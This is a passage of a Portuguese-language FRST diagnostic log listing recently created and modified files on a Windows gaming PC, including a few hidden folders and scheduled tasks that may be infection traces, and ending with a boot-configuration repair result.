2023-04-05 11:05 - 2023-04-05 11:12 - 000000000 ____D C:\Users\matheuszao\AppData\Local\D3DSCache
2023-04-05 11:05 - 2023-04-05 11:05 - 000000000 ____D C:\Users\matheus\AppData\Local\Google
2023-04-05 11:05 - 2023-04-05 11:05 - 000000000 ____D C:\Users\matheus\AppData\Local\Comms
2023-04-05 11:04 - 2023-04-05 11:06 - 000003388 _____ C:\Windows\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-775453029-1261430004-3493644118-1022
2023-04-05 11:04 - 2023-04-05 11:04 - 000000000 ___RD C:\Users\matheuszao\OneDrive
2023-04-05 11:03 - 2023-04-05 11:23 - 000000000 ____D C:\Users\matheuszao\AppData\Local\Publishers
2023-04-05 11:02 - 2023-04-05 12:19 - 000000000 ____D C:\Users\matheuszao\AppData\Local\CrashDumps
2023-04-05 11:02 - 2023-04-05 11:23 - 000000000 ____D C:\Users\matheuszao\AppData\Local\Packages
2023-04-05 11:02 - 2023-04-05 11:06 - 000002439 _____ C:\Users\matheuszao\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2023-04-05 11:02 - 2023-04-05 11:04 - 000000000 ____D C:\Users\matheuszao
2023-04-05 11:02 - 2023-04-05 11:02 - 000000020 ___SH C:\Users\matheuszao\ntuser.ini
2023-04-05 11:02 - 2023-04-05 11:02 - 000000000 _SHDL C:\Users\matheuszao\Os Meus Documentos
2023-04-05 11:02 - 2023-04-05 11:02 - 000000000 _SHDL C:\Users\matheuszao\Modelos
2023-04-05 11:02 - 2023-04-05 11:02 - 000000000 _SHDL C:\Users\matheuszao\Menu Iniciar
2023-04-05 11:02 - 2023-04-05 11:02 - 000000000 _SHDL C:\Users\matheuszao\Documents\Os Meus VÃ­deos
2023-04-05 11:02 - 2023-04-05 11:02 - 000000000 _SHDL C:\Users\matheuszao\Documents\As Minhas Imagens
2023-04-05 11:02 - 2023-04-05 11:02 - 000000000 _SHDL C:\Users\matheuszao\Documents\A Minha MÃºsica
2023-04-05 11:02 - 2023-04-05 11:02 - 000000000 _SHDL C:\Users\matheuszao\DefiniÃ§Ãµes Locais
2023-04-05 11:02 - 2023-04-05 11:02 - 000000000 _SHDL C:\Users\matheuszao\AppData\Roaming\Microsoft\Windows\Start Menu\Programas
2023-04-05 11:02 - 2023-04-05 11:02 - 000000000 _SHDL C:\Users\matheuszao\AppData\Local\HistÃ³rico
2023-04-05 11:02 - 2023-04-05 11:02 - 000000000 ___RD C:\Users\matheuszao\3D Objects
2023-04-05 11:02 - 2023-04-05 11:02 - 000000000 ____D C:\Users\matheuszao\AppData\Roaming\Adobe
2023-04-05 11:02 - 2023-04-05 11:02 - 000000000 ____D C:\Users\matheuszao\AppData\LocalLow\Intel
2023-04-05 11:02 - 2023-04-05 11:02 - 000000000 ____D C:\Users\matheuszao\AppData\Local\VirtualStore
2023-04-05 11:02 - 2023-04-05 11:02 - 000000000 ____D C:\Users\matheuszao\AppData\Local\ConnectedDevicesPlatform
2023-04-05 10:59 - 2023-04-05 10:59 - 000000000 ___HD C:\$Windows.~WS
2023-04-04 11:51 - 2023-04-04 11:51 - 000000000 ____D C:\Users\matheus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WO Mic Client
2023-04-04 11:51 - 2023-04-04 11:51 - 000000000 ____D C:\Program Files (x86)\WOMic
2023-04-03 16:49 - 2023-04-03 16:50 - 000000000 ____D C:\Users\matheus2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Python 3.11
2023-04-03 13:57 - 2023-04-03 13:57 - 000001607 _____ C:\Windows\system32\config\VSMIDK
2023-04-03 13:56 - 2023-04-03 13:58 - 000000000 ____D C:\inetpub
2023-04-03 13:24 - 2023-04-05 11:06 - 000000000 ____D C:\Users\matheus2\AppData\Local\Discord
2023-04-03 11:25 - 2023-04-03 13:57 - 000000000 ____D C:\ProgramData\Malwarebytes
2023-04-03 11:25 - 2023-04-03 13:57 - 000000000 ____D C:\Program Files\Malwarebytes
2023-04-03 11:24 - 2023-04-03 11:24 - 000000112 ___SH C:\bootTel.dat
2023-04-03 11:22 - 2023-04-03 11:22 - 000000000 ____D C:\Users\Public\BlueStacks
2023-04-03 10:58 - 2023-04-03 10:58 - 000000000 ____D C:\ProgramData\Avast Software
2023-04-02 20:40 - 2023-04-02 20:40 - 000000000 ____D C:\Users\Public\Documents\OnlineFix
2023-04-02 17:26 - 2023-04-02 17:27 - 000000000 ____D C:\R.G. Catalyst
2023-04-02 16:40 - 2023-04-02 16:40 - 000000000 ____D C:\ProgramData\BlueStacks_nxt
2023-04-02 15:12 - 2023-04-05 11:06 - 000000000 ____D C:\Users\matheus2\AppData\Local\EpicGamesLauncher
2023-04-02 15:12 - 2023-04-02 15:13 - 000000000 ____D C:\ProgramData\Epic
2023-04-02 13:24 - 2023-04-02 13:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Pro Evolution Soccer 2014
2023-04-02 13:22 - 2023-04-02 13:22 - 000000000 ____D C:\ProgramData\KONAMI
2023-04-02 12:52 - 2023-04-02 15:11 - 000000000 ____D C:\Games
2023-04-02 12:39 - 2023-04-02 12:39 - 000000000 ____D C:\ProgramData\Riot Games
2023-04-01 20:23 - 2023-04-04 15:28 - 000000000 ____D C:\Users\matheus2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Roblox
2023-04-01 19:21 - 2023-04-01 19:21 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\by.xatab
2023-04-01 18:06 - 2023-04-01 18:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2023-04-01 13:51 - 2023-04-05 11:09 - 000000000 ____D C:\Users\matheus2\AppData\Roaming\uTorrent Web
2023-04-01 13:50 - 2023-04-05 11:06 - 000000000 ____D C:\Users\matheus\AppData\Roaming\uTorrent Web
2023-04-01 13:50 - 2023-04-01 13:50 - 000001882 _____ C:\Users\matheus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\uTorrent Web.lnk
2023-04-01 11:19 - 2023-04-01 11:19 - 000000000 __SHD C:\Users\matheus2\AppData\Roaming\jun-takahashi
2023-04-01 11:19 - 2023-04-01 11:19 - 000000000 __SHD C:\Users\matheus2\AppData\Roaming\blue-helmets
2023-04-01 11:18 - 2023-04-01 11:18 - 000000000 __SHD C:\Users\matheus\AppData\Roaming\jun-takahashi
2023-04-01 11:18 - 2023-04-01 11:18 - 000000000 __SHD C:\Users\matheus\AppData\Roaming\blue-helmets
2023-04-01 11:17 - 2023-04-01 11:17 - 002179072 _____ C:\mono.msi
2023-04-01 11:17 - 2023-04-01 11:17 - 000000000 ____D C:\Mono
2023-03-19 11:09 - 2023-03-19 11:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\(Default)
2023-03-18 18:21 - 2023-03-18 18:21 - 000000000 ____D C:\Intel
2023-03-18 17:52 - 2023-03-18 17:52 - 000001260 _____ C:\Users\Public\Desktop\IObit Unlocker.lnk
2023-03-18 17:52 - 2023-03-18 17:52 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IObit Unlocker
2023-03-18 17:52 - 2023-03-18 17:52 - 000000000 ____D C:\ProgramData\IObit
2023-03-18 17:52 - 2023-03-18 17:52 - 000000000 ____D C:\Program Files (x86)\IObit
2023-03-18 17:05 - 2023-03-18 17:05 - 000000000 ____D C:\Users\matheus2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Riot Games
2023-03-17 20:38 - 2023-03-17 20:38 - 000000000 ____D C:\Users\matheus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\sox-14.4.2
2023-03-17 20:38 - 2023-03-17 20:38 - 000000000 ____D C:\Program Files (x86)\sox-14-4-2
2023-03-16 21:28 - 2023-04-05 11:09 - 000000000 ____D C:\Users\matheus2\AppData\Roaming\.minecraft
2023-03-16 21:25 - 2023-03-16 21:25 - 000000000 ____D C:\ProgramData\Oracle
2023-03-16 20:38 - 2023-03-16 20:38 - 000000000 ____D C:\Program Files\Intel
2023-03-16 20:10 - 2023-03-16 20:10 - 000027048 _____ (EasyAntiCheat Oy) C:\Windows\system32\eac_usermode_8409314267899.dll
2023-03-16 19:51 - 2023-03-16 19:57 - 000000000 ____D C:\Program Files (x86)\EasyAntiCheat
2023-03-16 19:33 - 2023-03-16 19:33 - 000000000 ___SH C:\Users\Public\Shared Files
2023-03-15 18:41 - 2023-03-15 18:44 - 000000000 ____D C:\Windows\CSGhostTemp
2023-03-12 20:45 - 2023-03-12 20:45 - 000000000 ____D C:\$WINDOWS.~BT
2023-03-12 20:36 - 2023-04-05 11:01 - 000000000 ____D C:\ESD
2023-03-12 20:33 - 2023-03-12 20:45 - 000000001 _____ C:\ProgramData\c
2023-03-12 20:33 - 2023-03-12 20:33 - 002787931 _____ C:\ProgramData\products.xml
2023-03-12 20:33 - 2023-03-12 20:33 - 000063184 _____ C:\ProgramData\products.cab
2023-03-12 20:33 - 2023-03-12 20:33 - 000043745 _____ C:\ProgramData\products2009.cab
2023-03-12 20:33 - 2023-03-12 20:33 - 000000062 _____ C:\Windows\system32\latest_MCT_script.url
2023-03-12 20:33 - 2023-03-12 20:33 - 000000010 _____ C:\ProgramData\latest
2023-03-12 16:46 - 2023-03-12 16:46 - 007837576 _____ C:\Windows\system32\Drivers\EMAC-Driver-x64.sys
2023-03-12 16:46 - 2023-03-12 16:46 - 004503416 _____ C:\Windows\system32\Drivers\EMAC-BT-Driver-x64.sys
2023-03-12 16:46 - 2023-03-12 16:46 - 003827232 _____ C:\Windows\system32\Drivers\EMAC-Driver-x64-stable.sys
2023-03-12 16:45 - 2023-03-12 16:45 - 000002677 _____ C:\Users\matheus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Gamers Club Anti-Cheat.lnk
2023-03-12 15:33 - 2023-03-12 15:33 - 000000000 ____D C:\Users\matheus2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FACEIT Ltd
2023-03-12 15:32 - 2023-03-19 16:31 - 000000899 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FACEIT AC.lnk
2023-03-12 15:31 - 2023-03-26 13:24 - 000000000 ____D C:\Program Files\FACEIT AC
2023-03-09 19:39 - 2023-03-09 19:41 - 000000000 ____D C:\Program Files (x86)\3d741040170311ecac51806e6f6e6963633dc1846dfd81e693b35f5c4f93a55c
2023-03-09 19:14 - 2023-03-09 19:14 - 000003940 _____ C:\Windows\system32\Tasks\ChromeUpdate
2023-03-09 19:14 - 2023-03-09 19:14 - 000003932 _____ C:\Windows\system32\Tasks\MSEdgeUpdate
2023-03-09 19:14 - 2023-03-09 19:14 - 000000000 ____D C:\Program Files\Edge Extension
2023-03-09 16:48 - 2023-03-09 16:48 - 000001465 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ahk2Exe.lnk
2023-03-09 16:47 - 2023-03-09 16:47 - 000002249 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoHotkey Window Spy.lnk
2023-03-09 16:47 - 2023-03-09 16:47 - 000001359 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoHotkey.lnk

==================== Um mÃªs (modificados) ==================

(Se uma entrada for incluÃ­da na fixlist, o arquivo/pasta serÃ¡ movido.)

2023-04-05 12:07 - 2021-09-16 15:39 - 001760146 _____ C:\Windows\system32\PerfStringBackup.INI
2023-04-05 12:07 - 2019-12-07 16:10 - 000767202 _____ C:\Windows\system32\prfh0816.dat
2023-04-05 12:07 - 2019-12-07 16:10 - 000152400 _____ C:\Windows\system32\prfc0816.dat
2023-04-05 12:07 - 2019-12-07 10:13 - 000000000 ____D C:\Windows\INF
2023-04-05 12:00 - 2021-09-16 15:32 - 000008192 ___SH C:\DumpStack.log.tmp
2023-04-05 12:00 - 2021-09-16 15:32 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2023-04-05 11:59 - 2019-12-07 10:03 - 001048576 _____ C:\Windows\system32\config\BBI
2023-04-05 11:50 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\AppReadiness
2023-04-05 11:45 - 2022-07-16 18:36 - 000000000 ____D C:\Program Files (x86)\Google
2023-04-05 11:19 - 2019-12-07 10:14 - 000000000 ___RD C:\Windows\PrintDialog
2023-04-05 11:12 - 2023-02-22 19:07 - 000000000 ____D C:\Users\matheus2\AppData\Roaming\discord
2023-04-05 11:07 - 2023-02-22 16:01 - 000000000 ____D C:\Users\matheus\AppData\Local\Packages
2023-04-05 11:06 - 2023-02-24 19:45 - 000000000 ____D C:\Users\matheus2\AppData\Local\NVIDIA Corporation
2023-04-05 11:06 - 2023-02-22 18:02 - 000000000 ____D C:\Users\matheus2\AppData\Local\Packages
2023-04-05 11:06 - 2023-02-22 18:02 - 000000000 ____D C:\Users\matheus2\AppData\Local\ConnectedDevicesPlatform
2023-04-05 11:06 - 2023-02-22 18:02 - 000000000 ____D C:\Users\matheus2
2023-04-05 11:04 - 2023-02-22 16:01 - 000000000 ____D C:\Users\matheus\AppData\Local\ConnectedDevicesPlatform
2023-04-05 11:04 - 2023-02-22 16:01 - 000000000 ____D C:\Users\matheus
2023-04-05 11:02 - 2021-09-16 15:35 - 000000000 __RHD C:\Users\Public\AccountPictures
2023-04-05 11:02 - 2019-12-07 10:14 - 000000000 ___RD C:\Windows\ImmersiveControlPanel
2023-04-05 11:01 - 2021-09-16 16:31 - 000000000 ____D C:\Windows\Panther
2023-04-05 10:35 - 2019-12-07 10:03 - 000000000 ____D C:\Windows\CbsTemp
2023-04-04 22:07 - 2022-11-13 12:15 - 000000000 ____D C:\Program Files (x86)\AnyDesk
2023-04-04 15:07 - 2023-02-24 21:51 - 000000000 ____D C:\Users\matheus2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2023-04-04 13:20 - 2021-09-16 15:32 - 000000000 ____D C:\Windows\system32\SleepStudy
2023-04-04 11:47 - 2022-03-23 20:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TLauncher
2023-04-03 16:49 - 2022-05-06 15:41 - 000000000 ____D C:\ProgramData\Package Cache
2023-04-03 13:58 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\SysWOW64\inetsrv
2023-04-03 13:58 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\system32\inetsrv
2023-04-03 13:57 - 2019-12-07 10:14 - 000000000 ___HD C:\Windows\ELAMBKUP
2023-04-03 13:24 - 2023-02-22 19:07 - 000000000 ____D C:\Users\matheus2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord Inc
2023-04-03 11:45 - 2022-07-16 11:41 - 000180072 ____N (Microsoft Corporation) C:\Windows\system32\Drivers\storvsp.sys
2023-04-03 11:45 - 2022-03-19 22:18 - 000256312 ____N (Microsoft Corporation) C:\Windows\system32\Drivers\vmbusr.sys
2023-04-03 11:45 - 2021-04-09 14:56 - 000206152 ____N (Microsoft Corporation) C:\Windows\system32\Drivers\vpcivsp.sys
2023-04-03 11:45 - 2019-12-07 10:07 - 000044344 ____N (Microsoft Corporation) C:\Windows\system32\Drivers\vkrnlintvsp.sys
2023-04-03 10:53 - 2022-05-11 09:18 - 000000000 ____D C:\Users\42057
2023-04-02 15:40 - 2022-03-18 19:44 - 000000884 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BakkesMod.lnk
2023-04-01 19:22 - 2022-04-12 14:15 - 000000000 ____D C:\Windows\SysWOW64\directx
2023-04-01 19:21 - 2022-04-12 14:15 - 000000000 ___HD C:\Windows\msdownld.tmp
2023-04-01 15:26 - 2023-01-18 21:40 - 000000000 ____D C:\Program Files\dotnet
2023-04-01 12:02 - 2021-09-16 15:32 - 000003674 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2023-04-01 12:02 - 2021-09-16 15:32 - 000003550 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2023-04-01 11:09 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2023-03-31 21:23 - 2023-01-16 21:40 - 000002283 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2023-03-31 21:23 - 2021-09-16 15:32 - 000002445 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2023-03-28 16:53 - 2023-02-22 18:04 - 000003588 _____ C:\Windows\system32\Tasks\OneDrive Reporting Task-S-1-5-21-775453029-1261430004-3493644118-1021
2023-03-28 16:53 - 2023-02-22 18:03 - 000003384 _____ C:\Windows\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-775453029-1261430004-3493644118-1021
2023-03-28 16:53 - 2023-02-22 18:02 - 000002449 _____ C:\Users\matheus2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2023-03-18 17:56 - 2022-03-17 20:57 - 000000001 _____ C:\Windows\vgkbootstatus.dat
2023-03-16 20:24 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\LiveKernelReports

==================== Arquivos na raiz de alguns diretÃ³rios ========

2023-03-12 20:33 - 2023-03-12 20:33 - 019463448 _____ (Microsoft Corporation) C:\ProgramData\MediaCreationTool2009.exe
2022-10-22 20:49 - 2022-12-26 21:56 - 002379264 ___SH (Computing Corporation) C:\ProgramData\SearchFilter.exe

==================== SigCheck ============================

(NÃ£o hÃ¡ correÃ§Ã£o automÃ¡tica para arquivos que nÃ£o passaram na verificaÃ§Ã£o.)


BCD (recoveryenabled=No -> recoveryenabled=Yes) <==== restaurado com sucesso
==================== Fim de FRST.txt ========================